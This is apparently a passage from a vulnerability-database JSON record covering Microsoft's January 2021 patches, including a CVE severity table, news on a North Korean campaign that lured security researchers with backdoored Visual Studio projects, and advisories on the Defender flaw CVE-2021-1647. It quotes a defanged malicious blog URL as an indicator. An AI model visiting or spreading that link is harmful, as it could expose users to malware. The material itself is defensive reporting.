Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1718](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1718>) | Microsoft SharePoint Server Tampering Vulnerability | No | No | 8 | No \n[CVE-2021-1707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1707>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-1712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1712>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1719](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1719>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1711](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1711>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1713>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1714>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1636>) | Microsoft SQL Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647>) | Microsoft Defender Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1681>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1686>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1687>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1690>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1646>) | Windows WLAN Service Elevation of Privilege Vulnerability | No | No | 6.6 | No \n[CVE-2021-1650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1650>) | Windows Runtime C++ Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1663>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1670>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1672>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1689>) | Windows Multipoint Management Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1682>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1697>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1703>) | Windows Event Logging Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1645>) | Windows Docker Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-1637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1637>) | Windows DNS Query Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 7.7 | No \n[CVE-2021-1683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1642>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1685>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648>) | Microsoft splwow64 Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-1710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1710>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1691>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1692>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1643>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1644>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Apps Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1669>) | Windows Remote Desktop Security Feature Bypass Vulnerability | No | No | 8.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1694](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1694>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1702>) | Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1674>) | Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability | No | No | 8.8 | No \n[CVE-2021-1695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1695>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1676>) | Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1706>) | Windows LUAFV Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1661>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1704>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1696>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1708>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1657>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1679>) | Windows CryptoAPI Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-1652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1652>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1653>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1654>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1655>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1659>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1688>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1693](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1693>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1699>) | Windows (modem.sys) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1656>) | TPM Device Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1666](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1664](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1664>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1671>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1700>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1701>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1678>) | NTLM Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-1668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1668>) | Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1665](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665>) | GDI+ Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1649>) | Active Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Summary Graphs\n\n\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "modified": "2021-01-12T23:59:00", "published": "2021-01-12T23:59:00", "id": "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "href": "https://blog.rapid7.com/2021/01/12/patch-tuesday-january-2021/", "type": "rapid7blog", "title": "Patch Tuesday - January 2021", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-26T16:35:34", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Hackers linked to [North Korea](<https://threatpost.com/north-korea-spy-reporters-feds-warn/160622/>) are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them \u2014 and then infects their organizations\u2019 systems with custom backdoor malware.\n\nThat\u2019s according to [Google\u2019s Threat Analysis Group (TAG),](<https://twitter.com/ShaneHuntley/status/1353856344655204352>) which issued a warning late Monday about a campaign it has tracked over the last several months that uses various means to interact with and attack professionals working on vulnerability research and development at multiple organizations.\n\nThe effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a [blog post](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) by TAG\u2019s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims\u2019 machines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe infections are propagated either through a malicious backdoor in a Visual Studio Project or via an infected website, he wrote. And moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions \u2014 a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.\n\nTAG attributed the threat actors to \u201ca government-backed entity based in North Korea.\u201d\n\n\u201cThey\u2019ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,\u201d according to the post. \u201cTheir blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u2018guest\u2019 posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.\u201d\n\nIn addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, [Discord](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>), Keybase and email to communicate with potential targets, Weidermann said. So far it seems that only security researchers working on Windows machines have been targeted.\n\n## **Making Connections**\n\nAttackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research together. Threat actors appear to be credible researchers in their own right because they have already posted videos of exploits they\u2019ve worked on, including faking the success of a working exploit for an existing and recently patched [Windows Defender vulnerability](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>), [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), on YouTube.\n\nThe vulnerability received notoriety as one that has been exploited for the past three months and leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>).\n\n\u201cIn the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,\u201d Weidermann explained.\n\nIf an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. Several targets [took to Twitter](<https://twitter.com/search?q=blog.br0vvnn.io&src=typed_query>) to describe their experiences.\n\n> I got targeted by Zhang Guo and sent me the blog post link hxxps://blog.br0vvnn[.]io/pages/blogpost.aspx?id=1&amp;q=1 <https://t.co/QR5rUYDHrh>\n> \n> \u2014 lockedbyte (@lockedbyte) [January 26, 2021](<https://twitter.com/lockedbyte/status/1353995532180615174?ref_src=twsrc%5Etfw>)\n\n\u201cWithin the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,\u201d Weidermann wrote. \u201cThe DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.\u201d\n\nVictims also can be infected by following a Twitter link hosted on blog.br0vvnn[.]io to visit a threat actor\u2019s blog, according to TAG. Accessing the link installs a malicious service on the researcher\u2019s system that executes an in-memory backdoor that establishes a connection to an actor-owned C2 server, researchers discovered.\n\nThe TAG team so far could not confirm the mechanism of compromise, asking for help from the greater security community to identify and submit information through the [Chrome Vulnerability Reward Program](<https://www.google.com/about/appsecurity/chrome-rewards/>).\n\nResearchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.\n\nWeidermann\u2019s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.\n\n\u201cWe hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when engaging with individuals they have not previously interacted with,\u201d Weidermann wrote.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-26T14:49:03", "published": "2021-01-26T14:49:03", "id": "THREATPOST:FF67AF009F2F0031599099334F6CC306", "href": "https://threatpost.com/north-korea-security-researchers-0-day/163333/", "type": "threatpost", "title": "North Korea Targets Security Researchers in Elaborate 0-Day Campaign", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-01-15T10:26:58", "bulletinFamily": "blog", "cvelist": ["CVE-2021-1647"], "description": "Every second Tuesday of the month it&#x27;s &#x27;Patch Tuesday&#x27;. On Patch Tuesday Microsoft habitually issues a lot of patches for bugs and vulnerabilities in its software.\n\nIt&#x27;s always important to patch, but the update that was released on January 12 is one to pay attention to. That&#x27;s because it contains a patch for a vulnerability in Windows Defender that is already being exploited in the wild.\n\n### The vulnerability in Windows Defender\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) list\u2014a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures. The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in Windows Defender was registered as [CVE-2021-1647](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-1647>)\u2014a Remote Code Execution ([RCE](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>)) vulnerability\u2014and was found in the Malware Protection Engine component (mpengine.dll). According to Microsoft: \n\n> &quot;While this issue is labeled as an elevation of privilege, it can also be exploited to disclose information. The type of information that could be disclosed if an attacker successfully exploited this vulnerability is uninitialized memory.&quot;\n\n### I don\u2019t see an update for this vulnerability\n\nIf you are missing this fix in your list, it&#x27;s possible that this bug has already been patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle. But you may want to check whether you are using a patched version.\n\n### What version of Windows Defender am I using?\n\nThe first patched version is 1.1.17700.4. If you want to make sure that you have a patched version of Windows Defender, here is how you can check this on a Windows 10 computer:\n\n * From the Windows Start Menu, search for **Windows Security** and click on the result that has the **App** text and the \u201cwhite on blue\u201d shield.\n * When Windows Security opens, click on the gear box icon with the **Settings** text at the bottom left of the Window.\n * When the Settings screen opens, click on the **About** link.\n * The Windows Security About page will now be open and will show the Antimalware Client Version (Microsoft Defender version), the Engine version (Scanning Engine), the Antivirus version (Virus definitions), and the Antispyware version (Spyware definitions).\n * The **engine version** is the one that matters here. It needs to be at 1.1.17700.4 or newer.\nFinding the Windows Defender version\n\n### The rest of the Microsoft updates\n\nThe total package contained over 80 patches. Ten of them were classified as critical, which means that they could possibly be used in the future by cybercriminals to attack unpatched systems. And even the ones that are not rated as critical could put you at risk at some point. It&#x27;s always important to apply all the patches as soon as you possibly can, especially when it concerns your operating system. So, please do go install these patches as soon as possible.\n\nStay safe, everyone!\n\nThe post [Microsoft issues 83 patches, one for actively exploited vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-01-13T19:40:58", "published": "2021-01-13T19:40:58", "id": "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/", "type": "malwarebytes", "title": "Microsoft issues 83 patches, one for actively exploited vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:37", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Microsoft has released a security advisory to address a remote code execution vulnerability,[ CVE-2021-1647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>), in Microsoft Defender. A remote attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1647 and apply the necessary updates. \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/01/14/rce-vulnerability-affecting-microsoft-defender>); we'd welcome your feedback.\n", "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/01/14/rce-vulnerability-affecting-microsoft-defender", "type": "cisa", "title": "RCE Vulnerability Affecting Microsoft Defender ", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-01-16T03:31:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1647"], "description": "\n", "edition": 4, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1647", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647", "published": "2021-01-15T08:00:00", "title": "Microsoft Defender Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-16T01:37:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1648"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1648", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648", "published": "2021-01-12T08:00:00", "title": "Microsoft splwow64 Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:27:52", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1658"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1658", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:28:02", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1666"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1666", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:29:55", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1665"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1665", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665", "published": "2021-01-12T08:00:00", "title": "GDI+ Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:27:36", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1673"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1673", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:29:56", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1705"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1705", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705", "published": "2021-01-12T08:00:00", "title": "Microsoft Edge (HTML-based) Memory Corruption Vulnerability", "type": "mscve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:27:50", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1660"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1660", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-21T13:27:40", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1667"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1667", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-024/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of 